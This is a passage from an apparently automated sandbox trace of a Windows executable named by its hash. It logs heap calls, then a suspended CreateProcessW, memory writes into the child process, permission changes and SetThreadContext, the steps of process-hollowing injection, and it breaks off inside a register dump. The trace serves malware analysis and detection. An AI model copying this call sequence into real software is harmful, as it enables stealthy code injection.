Size=0x24) returned 0x1305ea8 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7250 [0140.415] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7250 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305ea8 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7190 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300090 | out: hHeap=0x12c0000) returned 1 [0140.415] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7190 [0140.416] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7250 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75c8 [0140.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7250 | out: hHeap=0x12c0000) returned 1 [0140.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0140.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75c8 | out: hHeap=0x12c0000) returned 1 [0140.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff50 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effe0 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7598 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff50 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0140.416] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7400 [0140.416] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7598 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff50 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7400 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efef0 | out: hHeap=0x12c0000) returned 1 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00b0 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7670 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0060 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0080 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7670 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0060 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0080 | out: hHeap=0x12c0000) returned 1 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efff0 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff70 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00c0 [0140.417] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0140.417] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7448 | out: hHeap=0x12c0000) returned 1 [0140.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff70 | out: hHeap=0x12c0000) returned 1 [0140.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0140.418] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300338 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff40 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff60 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effb0 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x14f83c0 [0140.418] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x15851a8 [0140.419] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff40 | out: hHeap=0x12c0000) returned 1 [0140.419] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff60 | out: hHeap=0x12c0000) returned 1 [0140.419] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effb0 | out: hHeap=0x12c0000) returned 1 [0140.419] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300338 | out: hHeap=0x12c0000) returned 1 [0140.425] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x7df128*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x7df224 | out: lpCommandLine="", lpProcessInformation=0x7df224*(hProcess=0x23c, hThread=0x2d4, dwProcessId=0x10cc, dwThreadId=0x910)) returned 1 [0140.592] GetThreadContext (in: hThread=0x2d4, lpContext=0x7dee5c | out: lpContext=0x7dee5c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3a0000, Edx=0x0, Ecx=0x0, Eax=0xf47dcd, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x7ffff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0140.755] ReadProcessMemory (in: hProcess=0x23c, lpBaseAddress=0x3a0008, lpBuffer=0x7df208, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x7df208*, lpNumberOfBytesRead=0x0) returned 1 [0140.755] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0xeb0000 [0140.757] VirtualAllocEx (hProcess=0x23c, lpAddress=0x400000, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0140.757] VirtualAllocEx (hProcess=0x23c, lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x40) returned 0xd0000 [0140.761] WriteProcessMemory (in: hProcess=0x23c, lpBaseAddress=0xd0000, lpBuffer=0xeb0000*, nSize=0x20000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xeb0000*, lpNumberOfBytesWritten=0x0) returned 1 [0140.770] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xd0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0202.985] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xd1000, dwSize=0x19224, flNewProtect=0x20, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0202.993] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xeb000, dwSize=0x494, flNewProtect=0x4, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0202.994] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xec000, dwSize=0xb5d, flNewProtect=0x4, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0202.997] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xed000, dwSize=0x79e, flNewProtect=0x4, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0202.999] VirtualProtectEx (in: hProcess=0x23c, lpAddress=0xee000, dwSize=0x1a58, flNewProtect=0x2, lpflOldProtect=0x7df1e8 | out: lpflOldProtect=0x7df1e8*=0x40) returned 1 [0203.003] VirtualFree (lpAddress=0xeb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.006] WriteProcessMemory (in: hProcess=0x23c, lpBaseAddress=0x3a0008, lpBuffer=0x7df244*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x7df244*, lpNumberOfBytesWritten=0x0) returned 1 [0203.013] SetThreadContext (hThread=0x2d4, lpContext=0x7dee5c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x3a0000, Edx=0x0, Ecx=0x0, Eax=0xea1f8, Ebp=0x0, Eip=0x77968fe0, SegCs=0x23, EFlags=0x202, Esp=0x7ffff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, 